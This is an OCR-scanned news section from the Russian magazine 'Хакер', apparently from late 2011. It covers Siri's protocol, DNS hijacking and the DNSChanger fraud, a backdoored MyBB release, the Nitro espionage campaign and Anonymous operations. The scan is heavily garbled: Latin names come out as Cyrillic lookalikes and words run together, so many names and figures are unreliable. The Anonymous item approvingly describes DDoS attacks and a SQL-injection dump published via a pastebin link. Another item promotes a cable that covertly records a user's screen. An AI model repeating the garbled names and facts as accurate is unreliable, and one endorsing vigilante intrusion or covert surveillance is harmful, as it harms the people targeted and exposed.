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О ВЫГОДЕ 
ПОДПИСКИ 



Решил немного поделиться стобой инсайдом: расскажу о 
внутренней кухне издательской деятельности и о том, как рабо- 
таетдистрибуцияжурналов в России. Прежде всего, сухой факт: 
наценкаторговыхсетей всреднем не ниже 100%. Например, если 
ты купилХакерза 250 рублей, тодо редакции из этих денегдойдет 
меньше половины. Справедливы ли такие пропорции? В общем - 
то, это риторический вопрос, не имеющий никакого смысла: 
розничные сети обладают монополией, иименноони определяют 
всеусловия. Нехотите — не работайте. 

Ну и вообще их бизнес тоже не прост. Тут фа кт номер два: в 
каждой точке за месяц обычно продается 1-3 экземпляра журнала, 
аточекпродаж — десяткитысяч по всей России. Соответственно, 
частая ситуация: в одном киоске«Хакер»закончился, а в другом — 
лежит невостребованным. Все это требует сложной логистики, 
большихзатратна развоз продукции итакдалее. Поскольку мы 
незнаем, где насждет покупатель, приходится присутствовать в 
большом количестве киосков и тратить на это немало денег, по- 
лучая обратно возвраты — непроданные журналы. Все это сильно 
влияет и на торговую наценку, и на экономику журнала в целом. 

Решениеэтой проблемы есть, и оно на поверхности: ПОДПИСКА. 
В этом случае мы заранее знаем, сколько журналов и по какому 
адресу нужнодоставить, это прозрачно, выгодно и эффективно. 
Именно поэтому мы рады предложить лучшие цены на подписку: 
от 115 рублей за номер! Выгоднее всего оформить подписку можно 
в нашем магазине подписки зЬор.дІс.ги/хакер . Оплата любым 
электронным способом, доставка курьером по Москве, почтой — по 
России. И абсолютный хит: супервыгодная подписка самовывозом 
из редакции в Москве! 
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БОЛЕЕ ТЫСЯЧИ ЗАЯВОК было подано вэтом году 
на конкурс«Премия Рунета». 



ПРЕПАРИРОВАНИЕ 51 РІ 



ФРАНЦУЗЫ СУМЕЛИ ОТРЕВЕРСИТЬ ПРОТОКОЛ 
ПЕРСОНАЛЬНОГО П0М0ЩНИКА5ІКІ 




Разработчики из 
Арріісііит опубли- 
ковали в открытом 
доступевесьнабор 
инструментов, 
созданныхвходе 
«вскрытия»5ігі. 
Утверждается, что 
этихтулздолжно 
хватитьтем,кто 
техническиспособен 
написатьЗігі- 
приложение. 



□ пустя месяцпосле релиза 
іРЬопе 45 исследователям 
из французской компании 
Арріісііит удалось добраться до вну- 
тренностей 5ігі, который стал доступен 
в Ю5 5. Внимательно изучив протокол, 
французы сделали множество полез- 
ных выводов. Они также пообещали, 
что благодаря их изысканиям в скором 
будущем появится возможность ис- 
пользовать 5ігі для других приложений 
и устройств. Да -да, можно будет писать 
приложения для АпсІгоісІ, а также ис- 
пользовать 5ігі на іРаб. Все подробно- 
сти опубликованы на сайте компании 
Арріісііит: арріісііит.сот/еп/пеѵѵз/ 
сгаскіпд зігі . 

Основные заключения таковы: 
іРЬопе 45 действительно посылает 
на сервер необработанное аудио, 
сжимая его при помощи аудиокоде- 
ка 5реех. Для использования 5ігі на 
другом устройстве все равно потребу- 
ется идентификатор по крайней мере 
одного іРЬопе 45. Этот идентификатор 
довольно легко получить\подделать, о 
чем довольно подробно рассказывает- 
ся по ссылке выше. Конечно, есть риск 
пойматьбан,ноеслине выходить в 
Сеть сустройства, на котором установ- 
лено приложение, то он минимален. 

Протокол в целом очень «болтли- 
вый». іРЬопе обменивается большим 
количеством данных с серверами 
Арріе. Например, во время преобразо- 
вания текста вречь сервер даже при- 
сылает оценку доверия и временную 
метку для каждого слова. 



ІІВІІЫТІІДЛЯ 

МОБИЛЬНЫХУСТРОЙСТВ 

иВІЖ-Ш ОБЕЩАЕТ ПРЕВРАТИТЬСЯ В ПОЛНОЦЕННУЮ 
МОБИЛЬНУЮ ОС 




□ начале ноября Марк Шаттл ворт (основатель 

СапопісаІ, один из разработчиков йеЬіап, второй 
космическийтуристи человек, руководящий 
разработкой Шэипіи] объявил отом, что ІІЬипІи в будущем 
доберется до смартфонов, планшетов ителевизоров. 
Компания СапопісаІ готовитуниверсальную версию ОС, 
которая, как и ѴѴіпсІоѵѵз 8, будет подходить и для дескто- 
пов, и для мобильныхустройств на АРМ-процессорах. 
Выяснилось, что переговоры с производителями аппа- 
ратного обеспечения ведутсяуже полтора года. Впрочем, 
универсальная версия вряд л и появится в ближайшем 
будущем. Ожидается, что мобильныеустройства будут 
поддерживаться в ІІЬипІи 14.04, выход которой наме- 
чен на апрель 2014 года. Шаттл ворт подчеркнул, что к 
реализации этой идеи компания еще не приступала, пока 
только вела переговоры и «готовила почву». В настоящий 
моментвсеусилия СапопісаІ направлены на разработку 
ІІЬипШ 12.04, которую планируется представить в апреле 
2012 года. Шаттлворт отметил, что это будет І_Т5-версия 
(тоестьверсиясдолгосрочной поддержкой), поэтому 
разработчикизаинтересованы втом, чтобы сделатьее 
максимально стабильной. 




ѴШ00ѴѴ5ХРСТАЛАЭКСП0- 
НАТОМ В ПОЛИТЕХНИЧЕСКОМ 
МУЗЕЕ МОСКВЫ. Двадцать 
пятогооктябрявзале 
вычислительной техники 
были размещены два ПК, на 
которыхустановлена ОС. 




ИЗ АРРІ.Е УВОЛИЛИ ДИРЕК- 
ТОРА ПО БЕЗОПАСНОСТИ 

Джона Терио. По слухам, 
причиной увольнения стало 
то, что Терио не справлялся 
со своими обязанностями. 




РОССИЯ ВЫШЛАНАПЕРВОЕ 
МЕСТОВЕВРОПЕПОЧИСЛУ 
ИНТЕРНЕТЧИКОВ! По сооб- 
щению компании сот5соге, 
у нас в стране начитывается 
уже 50,81 млн пользователей 
Всемирной сети. 




ПАВЕЛ ВРУБЛЕВСКИЙ 
(СНКОЫОРАУ) ПРИЗНАЛСЯ 
В ТОМ, ЧТО ОРГАНИЗОВАЛ 
0005-АТАКУ на сайт конку- 
рента (А55І5І), в результате 
которой пострадала авиа- 
компания «Аэрофлот». 




ОФИЦИАЛЬНО ПОДТВЕРЖ- 
ДЕНО, ЧТ05ТЕАМ ВЗЛОМАН. 

Началось все с дефейса 
форумов, а в ходе расследо- 
вания сталоясно, что хакеры 
такжеполучили доступ к 
базеданныхБіеат. 
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№адага. Просто^удобно, надежно, 



ПСѲІ/й’шгіе 



Хеоп 



Максимальная продуктивность 
в сочетании с исключительной 
надежностью. 



. 



Семейство процессоров ІпСеГ Хеоп т ЕЗ 



Ш 



- ■■ ■ - -1 лл хл.-.- ■ - 



Я? - Почувствуйте разницу с ІпіеГ инше' 



N1 АС АР А 



Российские Суперкомпьютеры 



Процессор ІпіЫ®Хеоп® второго 
поколении на базе 32-нм 
производственной технологии 
может автоматически 
регулировать энергопотребление 
и точно настраивать 
производительность сервера 
в соответствии 

с потребностями приложений. 



А 

л‘- ? 



Серверы Міадага - мы знаем, как 
заставить технологии работать на вас. 

■ПММЙІНМВ всл 

я 'жж / Ш 

ѵѵюѵѵ.піадага.ги _ ѵ ч 

Циагара Компьютере, Москва 

Донской 5-й проезд. 15 \ . Л ^ > 

Телефон: (495) 955-55-50 (многоканальный)^ 






\/ іпзіде 



Мощный. 

Интеллектуальный. 



Корпорация ІпТеІ не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений относительно конкретных 
компьютерных систем, упоминание о которых содержится в данной рекламе. 

Корпорация ІпТеІ ©201 1 г. Все права защищены, ІпТеІ, логотип ІпНеІ, ІпТеІ Соге и Соге являются товарными знаками на территории США и других стран, Реклама, 

*Аругие наименования и товарные знаки являются собственностью своих зако иных владельцев. 











МЕ6АЫЕѴѴ5 В ОФИЦИАЛЬНОМ БЛОГЕ РАСЕВООК сообщается, что объектами атак ежедневно становятся порядка 600 тысяч аккаунтов социальной сети. 



РОІ_АРОЮ ВОЗВРАЩАЕТСЯ! 



ЦИФРОВАЯ КАМЕРАСФУНКЦИЕЙ МОМЕНТАЛЬНОЙ ПЕЧАТИ 




Девятнадцатого де- 
кабря 2008 компания 
Роіагоісі года объяви- 
ласебя банкротом, 
воспользовавшись 
11-й главой Кодекса 
СШАобанкротстве. 
Однаковсамой 
компании говорят, 
что банкротство 
носиттехнический 
характер и Роіагоісі 
продолжаетрабо- 
тать, а 11-я глава 
просто позволила 
компании провести 
финансовую ре- 
структуризацию. 



егендарный Роіагоісі попытался возродить камеры для моментальной 
фотографии: компания представила цифровой фотоаппарат2340 
ІпБІапІ Оідііаі Сатега. Новинка использует технологию печати 21 N К 
2его Іпк Ргіпііпд, ключевым элементом которой является специальная бумага 
с вкраплениями красящих кристаллов. Под воздействием тепла, выделяемого 
работающей «печатающей» головкой, кристаллы плавятся. При охлаждении 
кристаллизация не происходит, благодаря чему напечатанное изображение 
остается на бумаге. Словом, каки раньше, когда использовалисьаналоговые 
технологии, фотоаппарат позволяет получить «твердую копию» снимка вскоре 
после нажатия кнопки спуска. Разрешение камеры составляет 14 Мп. Она 
оснащена жидкокристаллическим дисплеем диагональю 2,7 м и слотом для 
карт памяти формата 5й. Объектив с фиксированным фокусным расстоянием 
(ЭФР43 мм) имеетмаксимальную диафрагму Р/3,2. Естьфункция видеосъемки 
(максимальное разрешение — 1280x720 пикселей). Роіагоісі 2340 печатает 
фотографии размером76х 102 мм, а бумага для него стоит порядка $20 за 30 
листов. Питается камера отлитиево-ионной аккумуляторной батареи, полного 
заряда которой, по словам производителя, хватает на 25 отпечатков. Камера 
позволяетвыбиратьснимки для печати и накладывать на изображения разные 
эффекты, в том числе добавлять белую рамку в стиле моментальных ретро- 
фотографий Роіагоісі. Цена 2340 Іпзіапі Оідііаі Сатега составляет около $300. 



ПЯТИМИНУТКАЮМОРА 



ПОСЛЕ ОБНОВЛЕНИЯ АНТИВИ- 
РУС АѴІКА СТАЛ ОПРЕДЕЛЯТЬ 
СОБСТВЕННУЮ БИБЛИОТЕКУ 
АЕ5СШРТ.0І.І. КАК ПОТЕНЦИ- 
АЛЬНУЮ МАЛВАРЬ 



НЕПРИЯТНОСТИ С 0Ы5 
ВЕЗДЕ И ВСЮДУ 

В БРАЗИЛИИ ЗАФИКСИРОВАНА МАССОВАЯ АТАКА, 

А В США РАСКРЫЛ И КРУПНУЮ АФЕРУ 

прошлом месяце в мире произошел сразу ряд 
инцидентов, связанных с подменой 0145-адресов. 
Больше всех, пожалуй, пострадала Бразилия 
— в стране была проведена массовая атака на сервера 
сразу нескольких крупнейших провайдеров. В результате 
атаки вдоменном кешебыли подменены 0145-записи для 
Ноітаіі, ОтаіІ, Ооодіе, М іеговой и других международных 
и локальных сервисов, в частности ІІоІДегга и (ЗІоЬо. Ты- 
сячи людей, обращаясь, скажем, к аооаіе.сот. шли не на 
ІР-адрес реального сервера компании Ооодіе, а на нужный 
хакерам веб-ресурс. Почти все фейковые сайты распро- 
страняли различные мал вари. К примеру, фей ковы й сайт 
боодіе предлагал пользователям скачать и установить 
программу боодіе беіюпсіег, которая на самом деле пред- 
ставляла собой набор вредоносных программ. На данный 
момент, по информации бразильских СМИ, по подозрению 
в организации этой атаки был задержан 27-летний со- 
трудник одного из крупных провайдеров страны, который 
спровоцировал обновление на многих 0145-серверах 
Бразилии, изменив 0145-записи. 

В США, в свою очередь, практически завершилась 
длившаяся два года операция бЬозІ СІіск. Сотрудники 
амери канских правоохранительных органов совместно 
с коллегами из-за рубежа успешно раскрыли мошен- 
ническую схему, основанную на использовании вируса 
0145 СЬапдег. Эта малварь заставляла устройства Мае 05 
Хи ѴѴіпсІоѵѵз доверять нестандартным 0145. Программа 
установила липовые ІР-адреса примернодля Ібтысяч 
доменов! В итогежертвы вируса, как нетрудно догадать- 
ся, попадали на различные мошеннические ресурсы. 
Всего вирь инфицировал более четырех миллионов ПК 
более чем в 100 странах мира, в том числе порядка 500 
тысяч компьютеров в Соединенных Штатах. По итогам 
операции прокуроры назвали имена семерых обвиняемых 
(все семеро из Восточной Европы), которые пред пол ожи- 
тельнозаработали на этом «бизнесе» более 14миллио- 
нов долларов, «похищая» клики и подменяя рекламные 
ссылки. В двухдата-центрах (в Нью-Йорке и Чикаго) 
прошли обыски, в результате которыхбыло выведено из 
строя более ста контрольных серверов. Для того чтобы 
уменьшитьущерб, нанесенный зараженным компью- 
терам, вредоносные 0145-сервера были заменены на 
управляемые ІпІегпеі5у5Іет5 СопБогІіит. Федеральные 
обвинители считают, что за этой аферой стоит эстонская 
компания Роѵе Оідііаі. Так как шестеро из семи подо- 
зреваемых — граждане Эстонии, это похоже на правду. 
Заокеанские федеральные прокуроры теперь хотят до- 
битьсятого, чтобы задержанныхэкстрадировали в США. 
Седьмой обвиняемый в этом деле — гражданин России, 
находящийся на свободе, числится в розыске. Главой 
ЕзШотаіпз — доменного регистратора, который предо- 
ставлял услуги преступникам, был Владимир Чащин. Его 
уже судили в Эстонии и лишили аккредитации ІСАІ4І4 еще 
в 2008, после обвинения в мошенничестве, отмывании 
денег и подделке доку ментов. Каждого задержанного об- 
виняют в пяти случаях мошенничества с использованием 
электронныхсредств коммуникации и взлома компьюте- 
ров. Ча щи ну также предъявлено обвинение в 22 случаях 
отмывания денег. Обвиняемые суммарно могут получить 
85леттюремногозаключения. 
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Ж- молоко 



Вся продукция =ТЕВЬЕ МОЛОЧНИК* произведена из цельного 
(невосстановленного] молока очень высокого качества. 
Такой строгим контроль оказывается важным и для людей, 
заботящихся о здоровье, поскольку в последнее время на рынке появилось 
-ь мд подделок и разбавлений как молока, таки продуктов из нщр- 



• 1 






гг 


щ 1 






МЕ6АЫЕѴѴ5 



В ХОДЕ ОПРОСА, ПРОВЕДЕННОГО ТНЕС0Ы51ЖЕКІ5Т, ВІААбыла признана худшей компанией Америки. 



ГЛОНАСС ДОЛЖЕН БЫТЬ ВЕЗДЕ! 

ВСЕ УСТРОЙСТВА, РАБОТАЮЩИЕ В СЕТЯХ ѴѴІ-РІ, ДОЛЖНЫ БЫТЬ 
ОСНАЩЕНЫ ГЛОНАСС И ЛИЦЕНЗИРОВАНЫ 




ремя от времени наши власти очень любят на- 
поминать нам, что мы живем в России, а значит, 
скучно небудет. Очередная инициатива Мин- 
комсвязи обернулась, как бы это сказать помягче, очень 
забористым маразмом. Во-первых, согласно приказу, 
вступившему в силу 10 октября, все точки беспроводного 
радиодоступа следуетоснаститьаппаратурой системы 
спутниковой навигации ГЛОНАСС или ГЛ0НАСС/6Р5. Да, 
ВСЕ точки доступа, то есть все роутеры, ноутбуки, смарт- 
фоны и прочиедевайсы, использующиестандарт802.11. 
Во-вторых, обладателю та кой точки доступа требуются 
лицензии и разрешения Роскомнадзора. Получается, что, 
с одной стороны, устройства малого радиуса действия 
(мощностью не более 100 мВт), работающие по стан- 
да рту 802.11, не подлежат обязательной регистрации. 
Сдругой стороны, Минкомсвязиутверждаетобратное. 
Невыполнение приказа грозит не только администра- 
тивным штрафом, который составляеттысячу рублей, но 
и конфискацией соответствующего оборудования. Если 
ты все еще надеешься, что здесь какая-то ошибка, спешу 
тебя «обрадовать» — ошибки нет. Министерство связи и 
массовых коммуникаций РФ уже официально подтверди- 
ло всю приведенную выше информацию и конкретизиро- 
вало ее. Правда, оно почему-то не объяснило, каки зачем 
встраиватьмодуль ГЛОНАСС в роутер или ноутбук. 




іРМопе45, какты 
помнишь, оказался 
оснащен модулем 
ГЛОНАСС, что для 
многихсталосюр- 
призом.Вкомпании 
Арріеопределенно 
что-тознали:). 



НЕПРОСТАЯ 
УЯЗВИМОСТЬ В МУВВ 



НЕИЗВЕСТНЫЕ ХАКЕРЫ ПОКОПАЛИСЬ В КОДЕ 
ПОПУЛЯРНОГО ОТКРЫТОГО ФОРУМА 

□ есьма некрасивый фей л приключился с разра- 
ботчиками открытогофорума МуВВ. Еще в начале 
октября в официальном блоге была опубли- 
кована информация о некой критической уязвимости, 
обнаруженной в последней версии МуВВ 1.6.4. Но все 
оказалосьнетакпросто. Дырка, позволяющая выполнить 
произвольный код РНР, возникла несама посебе. Как 
выяснилось, уязвимость добавил и в код неизвестные 
хакеры, попроступодменивархивсрелизомфорума на 
сервере загрузки. Каким образом хакеры проникли в 
систему, до сих пор не установлено, ведь движок сайта 
хоть и разработан своими силами, но все же основан на 
использовании сторон них открытых фрейм ворков. Теперь 
разработчикиуверяют, что проблема безопасности при- 
сутствует не в коде их СМ5, который не распространяется 
публично, а именно в этих самых внешних фрейм ворках. 
Какбыто ни было, теперь всем пользователям МуВВ 1.6.4, 
загрузившим архив до 6 октября, нужно срочно установить 
обновление. Разработчики междутем задумались, как 
избежатьподобныхинцидентов вбудущем. Планируется 
начать распространение контрольных сумм для проверки 
целостности изначально опубл и кованных архивов. Для 
распространения контрольных сумм будет использовать- 
ся сторонний сервер, чтобы хакеры не смогли подменить 
файлы с контрольными суммами. Также разработчики 
рассматривают возможность использования для органи- 
зации загрузки релизов сетей доставки контента (СОІ\І). 



м^вв * 





ѴѴЕХІ.ЕК.ВООК Е7001. Компания ѴѴехІег представляет новую 
электронную книгу ѴѴЕХІ.ЕВ.ВООКЕ7001 на базе 7.0" сен- 
сорногоэкрана, благодаря которомуэтотпродуктявляется 
уникальным для рынка стран СНГ. Устройство оснащено4 ГБ 
встроенной памяти (можно расширить до 32 ГБ с помощью 
тісгоБО), поддерживает самые популярные форматы 
электронных книг, изображений и аудио файлов; позволяет 
слушать РМ-радио. Ридер оснащен литий-полимерным акку- 
мулятором емкостью 1500 тАИ, а значит, может работать без 
подзарядки несколько недель. Новинка выполнена втонком 
эргономичном корпусе, задняя панель которого изготовле- 
на из легкого алюминиевого сплава. ѴѴЕХІ.ЕК.ВООКЕ7001 
поставляется в кожаной обложке. Рекомендованная цена 
устройства: 5 990 руб. 




«ЧТОУГОДНОДОЛЬКОНЕ 
600СІ.Е!»— видимо, так ду- 
маютв компании МісговоН. 
Теперь поисковик Віпд 
предлагает пользователям 
скачать и установить брау- 
зер Ріге^ох. 



В38МЛРД РУБЛЕЙ ОЦЕНЕН 
УЩЕРБот ІпІегНІт.ги и 
Ригкагариг.ш. Владельцы 
сайтов супруги Лопуховы 
нарушили авторские и 
смежные права 13 киноком- 
паний. 
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магазинах твоего \ 

Участвовать в акциях \ 1 

и посещать закрытые 

мероприятия для держателей «Мужской Карты» 

. V . с# уШ А ■ гг г | 

Управлять своими счетами, используя систему 



интернет-банка «Альфа-Клик» 

Оформлять подписку на журнал 
«Хакер» со скидкой 50% 

тел. подписки (495)-663-82-77 | $Иор.дІс.ги 



Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а так же заказав по телефонам: 

(495) 229-2222 в Москве | 8-800-333-2-333 в регионах России (звонок бесплатный) 



А Альфа* Банк (ВЗІЛВ)ІЗШІ 



ѵѵѵѵѵѵ.тапсагсІ.ги 



ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление 
банковских операций от 79.0 1 1398 N"1326" 



Ѵѵ 





МЕ6АЫЕѴѴ5 



ЕИТЕМ5Ѵ5 И СОММТОІКН СООБЩАЮТ, что Россия генерирует 6,7% отобщего количества спама в мире. 



АНОНИМУС ПРОТИВ НАРКОКАРТЕЛЕЙ И ПЕДОФИЛОВ 

БЕЗЛИКИЙЛЕГИ0НСП0С0БЕН НЕТОЛЬКО НА ИЗДЕВАТЕЛЬСТВА НАД КОПИРАСТАМИ И ВЛАСТЯМИ 



очти каждый месяцмы публикуем новости с 
фронта борьбы Анонимус со всем белым светом, 
но на этот раз «последние сводки» вы глядят 
необычно даже для а нонов. 

Недавно на ѴоіЛТіЬе появилась интересная видеоза- 
пись: человек в маске Гая Фокса пропущенным через 
модулятор голосом обратился отимени Апопутоиз к 
мексиканскому наркокартелю «Зетас» (2еІаз) с требо- 
ванием отпустить захваченного члена ха ктивистской 
группы. Стоитотметить, что картель«3етас», известный 
своей жестокостью, уже «кара л» тех, кто осмеливался 
вести против него войну в Сети. Так, 26 сентября 2011 года 
в Нуэво-Ларедобыла обезглавлена работница мест- 
ной газеты. Согласно оставленной записке, женщину 
убили из-за ее активности на сайте. А совсем недавно 
поаналогичной причинебылубитмужчина-блогер. Из 
опубликованного Апопутоиз ролика неясно, кого именно 
требовали отпустить хакеры — ни имен, ни никнеймов 
названо не было. Зато Анонимус пригрозила картелю, 
что, если в течение месяца со дня публикации видео 
еетребования небудутвыполнены,хак-группа начнет 
публиковать да иные о помогающих «Зетас» коррумпи- 
рованных полицейских, таксистах, журналистах итак 
далее. Посути, Анонимус объявила ОрСагІеІ (Операция 
Картель). После этого сайт мексиканского политика, по- 
дозреваемого в связи с картелем, был взломан, а до СМИ 
дошла информация, что многие а ноны запаниковали и 
даже отказа л ись учу вствовать в операции. Однако она за- 
вершилась, неуспев начаться, — одна изсамыхстрашных 
преступныхорганизаций в мире отпустила заложника, и 
ОрСагІеІ попросту отменили. ВоттакАнонимус одержала 
верх над наркокартелем. 

Однако это не все. В этом месяце Анонимус провела 
ещеодну громкую операцию, которую, без всякогосо- 
м нения, можно назвать важной, нужной и правильной. 
Вездесущие ха кти в исты вывели из строя подпольный 
сайт с детской порнографией и обнародовали список его 
участников. Началось все с обнаружения сайта на домене 
.опіоп — НісИеп ѴѴікі, где содержались ссылки на сотни 
ресурсов с детским порно. Анонимус удал ила ссылки, но 
администраторы вернули их на место. Тогда-то хакеры и 
заметили, что на большинстве фотографий стоит водяной 
знакхостера Ргеебот Нозііпд. Азатем... Процитируем 
самиханонимов:«Положивсервера Ргеебот Нозііпд, мы 
удалили более 40 сайтов с детской порнографией, среди 




Г' «г 
0 0 0 



которыхбыл І_оІіІа Сііу — крупнейший ресурс, содержав- 
ший более 100 Гб детской порнографии. Мы продолжим 
обрушение не только Ргеебот Нозііпд, но и любого другого 
сервера, который будетзамечен в распространении 
детской порнографии». В рамках Орегаііоп йагкпеі на 
хостингбыла проведена серия ОйоЗ-атак. Судя по отчету 
об операции, база данных пользователей сайта І_оІіІа Сііу 
была извлечена с помощью 501-инъекции. Владельцы 
хостинга, кстати, попыталисьсопротивляться атаке, но 
Анонимус это неостановило. Все полученные данные 
ха кти висты традиционно выложили в открытый доступ: 
разіеЬіп.сот/ТІІ-НпгЕѴѴ . 



За последний месяц 
АпопутоиБуспела взло- 
мать сайт Мусульманско- 
го братства. Атаки про- 
водились из Германии, 
Франции, Словакиии 
Сан-Франциско соско- 
ростью2000-6000хитов 
в секунду. Позже хакеры 
увеличилискорость 
атаки до Звтысяч хитов в 
секунду. 



ЕВГЕНИЙ КАСПЕРСКИЙ: 




«ІТ НУЖНЫ ВОЕННЫЕ СТАН- 
ДАРТЫ БЕЗОПАСНОСТИ. 
КОГДА ЦЕНА ИНФОРМАЦИИ 
СЛИШКОМ ВЫСОКА, НУЖНО 
ОТКЛЮЧАТЬ СЕТИ ОТ 
ИНТЕРНЕТА» 
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Алексей Синцов (Оазіпізоѵ) 



Ьаскегіѵѵееіз 






Г & 



ГЭЕбіБІгозаг: 

«Большая часть технологий 
обеспечения безопасности 
«безопасна» только потому, что 
никто даже не пытался атаковать их» (Петер 
Гатман). 



гаікоипз: 

Сообществу безопасников 
необходим обширный ресурс 
для планирования конферен- 
ций. Ещё один Ооодіе-календарь — это не 
решение. 



(Этікко: 

Другие примеры клевых корот- 
ких ІР-адресов: //49.2; 

'96.4; М ІА ; 

.99 . Нулики восстанавливаются 
словно по волшебству... 



(ЭКодипіх: 

йоБ/РоС-эксплойт для пере- 
полнения ІСМР геГСоипІ в стеке 
ТСР/ІР (МБ1 1 -083) требует 2 Л 32 
11РО-пакетов, следовательно, при 250 пото- 
ках процесс займет 52 дня. 

Ссо/ОУРСМѵРѵ . 





Газета: 

Вчера был последний мой день 
в МісгозоК/МБРС. Так здорово 
было там работать! А уже через 
несколько недель я присоединюсь к коман- 
де безопасности Соодіе. Ушел++. 

□ Комментарий: 

Фермин Джей Серна — один из авто- 
ров замечательной утилиты ЕМЕТ, которая 
позволяет внедрять технологии, предотвра- 
щающие эксплуатацию уязвимостей, в про- 
извольные приложения. Хорошая работа! 




« ганижшАті: 

Здесь нет будущего для людей, 
которые живут в защитном 
режиме. Они тратят свою жизнь 



на страхи. 





(ЭѴѴеШРопгі: 

Поисковик БЬобап может ска- 
зать тебе, где найти в интернете 
системы Біетепз Бітаііс. 

Ссо/иОРЬЗсд . 

Н Комментарий: 

У нас модный журнал. БСАйА — это 
модно. И найти БСАйА-интерфейсы в интер- 
нете — это тем более модно. 



(Этікко: 

Лучший пароль — это «не 
верен», теперь у тебя есть напо- 
миналка в случае неверного 
ввода: «Введенный пароль не верен». 

#ѴѴ0Г5ІрЭ55ѴѴ0ГСІ 




(ЭѴѴеШРопгі: 

Следуя инновации от Ооодіе, 
группа вендоров призывает 
ОІІуйЬд и ЮА Рго поддержать 
опцию _поРЕ.ехе в соглашении об именова- 
нии файлов. 

□ Комментарий: 

Ах-ха. :) Этот твит появился сразу 
после того, как Ооодіе великодушно пред- 
ложил не регистрировать точки доступа 
ѴѴі-Рі, в конце имени которых имеется слово 
«_потар». :) 



ОіпбИОг: 

Каждый год Осіау для ВІІ\Ю. 

Комментарий: 

Таинственным образом по всей 
планете стали падать 0145-сервера ВІІ\Ю, 
что вызвало слух о РоБ Обау. 




ГЭРиСТРЕ: 

Поздравляем окончатель- 
ного победителя #РиСТРЕ 
— ОІбЕигОре из РѴѴТН, Ачен, 

Германия. 

Ссо/ІЦІІ94Ко . 

□ Комментарий: 

Крупнейший СТР закончился побе- 
дой немцев. 



05(ерІіепѵѵе5(: 

Ноѵѵ Іо бо а репіезі: 

1. йгаѵѵ Ііпе ѵѵібп реп. 

2. СЬеск Ііпе. 

3. \і ѵізіЫе, реп ѵѵогкз. 

4. II" по Ііпе, реп боез по* ѵѵогк. 

Н Комментарий: 

ИБ-шники шутят. Как проводится 
реп*ез*? 

1. Ручкой (реп) рисуем линию. 

2. Проверяем линию. 

3. Если она видна, значит, ручка работает. 

4. Если линии нет, значит, ручка не работает. 



ГЭсБодИоіап: 

СЬготе теперь включает функ- 
цию зііепбуіпзіаііі) для скрытой 
” установки расширений. Я уве- 
рен, что РВІ полюбит эту фичу. 

Ссо/5ЕЬУ8АІІС . 



і 



ГЭісІискІ 337: 

Пища для философских раз- 
мышлений: ЬазЬ: ./: — это 
директория. 




(ЭДООги: 

Обновленная таблица системных 
вызовов в ѴѴіпбоѵѵз (І4Т/2000/ 
ХР/2003/Ѵіз*а/2008/7/8). Больше 

деталей: 

□ Комментарий: 

Чтобы читатели не жаловались на 
бесполезность этой рубрики, вот вам полез- 
ный линк. Ну как? :) 
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ЛИШЫРЕТЬ ДОМЕННЫХ ИМЕН |ИЗ 926 ТЫСЯЧ), зарегистрированных в зоне рф, активно 

используется владельцами. 



ХИМИКИ И «ОБОРОНКА» 
В ОПАСНОСТИ! 



шпионитьможно 

ПО-РАЗНОМУ 



ОБНАРУЖЕНА ЕЩЕ ОДНА АТАКА, НАПРАВЛЕННАЯ 
НАПРОМЫШЛЕННЫЕ ПРЕДПРИЯТИЯ 




Командныесервера 
ІМіІго, которые 
удалось отследить, в 
большинствесвоем 
были виртуальными 
ирасполагалисьна 
территории США. В 
основном ихарен- 
довали граждане 
Китая. 



ослеЗіихпеІ, наверное, сложно кого-то удивить вирусами и атаками, 
направленными не на рядовых юзеров, а на промышленный сектор. 
Лишнее подтверждение тому, что подобных атак становится больше, 
обнаружили специалисты компании Зутапіес. Атака, условно названная 
ІМіІго, началасьеще в концеапрелятекущего года и была ориентирована на 
правозащитные организации, но потом ее создатели выбрали своей целью 
промышленные предприятия. Атаке подверглись 29 компаний в 19 отраслях, в 
том числе в химической и оборонной (утверждается, что таких компаний может 
быть намного больше). Доподлинно известно, что за эти несколько месяцев в 
результате заражения были похищены данные более чем со ста промышлен- 
ных компьютеров. Хакеры действовали вполне традиционно — направляли 
сотрудникам компаний электронные письма, замаскированные под корпора- 
тивную рассылку. Большинство таких мейлов содержали архивы с китайским 
троянским софтом (в основном троянцы Роізопіѵу). После заражения наме- 
ченного компьютера троян связывался с командным сервером и инфицировал 
другие корпоративные машины, находящиеся втом же домене. Эксперты 
Бутапіес отмечают, чтоатакующиечасто использовали индивидуальные 
методики и сценарии атак. География Шго достаточно широка: большинство 
заражений пришлось на США, Бангладеш и Великобританию. 




ОЧЕНЬНЕЗАМЕТНЫЙ И ХИТРЫЙ ВИДЕОЛОГГЕР 

акихтолькосредств не изобрели люди, чтобы 
шпионить за ближними! Некоторым гаджетам 
позавидовал бы даже Джеймс Бонд. Штука, о ко- 
торой я хочу сегодня тебе рассказать, как раз из их числа. 
Как проследить, чем занимается человек за компьюте- 
ром? Конечно, можно установить кейлоггер или иное ПО 
для слежки, но его довольно легко обнаружить. Можно ис- 
пользовать и аппаратный кейлоггер, но порой даже этого 
можетоказаться недостаточно. Занятная альтернатива 
этим старым добрым способам — видеологгер ѴісІеобЬозІ, 
маскирующийся подобычный кабель. Вместо того чтобы 
запоминать набранный текст, устройство сохраняет 
скриншоты всего, что отображается на экране (объем 
встроенной флэш-памяти — 2 Гб). ѴісІеобЬозІ отличается 
от обычного кабеля тем, что с одного конца у него имеется 
ІІ5В-коннектор. При подключении к 115В- разъему ком- 
пьютера кабельопределяется какфлеш-накопитель, с ко- 
торого можно слить да иные. Для считывания сохраненных 
данных понадобится персональный ІІ5В-ключ, который 
поставляется в комплекте с ѴісІеоСЬозБ Выпускаются 
версии кабеля с разъемами Ѵ6А, БѴІ и ГЮМІ, каждая из 
нихобойдется примерно в $200. 








- 



РЕСУРС ВКОНТАКТЕ ВВЕЛ 
ТЕСТНАЗНАНИЕ0СН0В 
КОМПЬЮТЕРНОЙ БЕЗОПАС- 
НОСТИ. Еслитвой аккаунт 
взломали, придется отве- 
тить на несколько простых 
вопросов. 




АНТОН НОСИК ВЕРНУЛСЯ РА- 
БОТАТЬ В ЗЦР на должность 
медиадиректора компании. 
Уже известно, что из ЖЖ 
исчезнетпочти вся реклама 
и появится «карма». 



Соодіе 



ДОЛЯ МОБИЛЬНОГО БРАУЗЕ- 
РА6006І_Е, предустанавли- 
ваемого на устройства с ОС 
АпсІгоісІ, на рынке возросла 
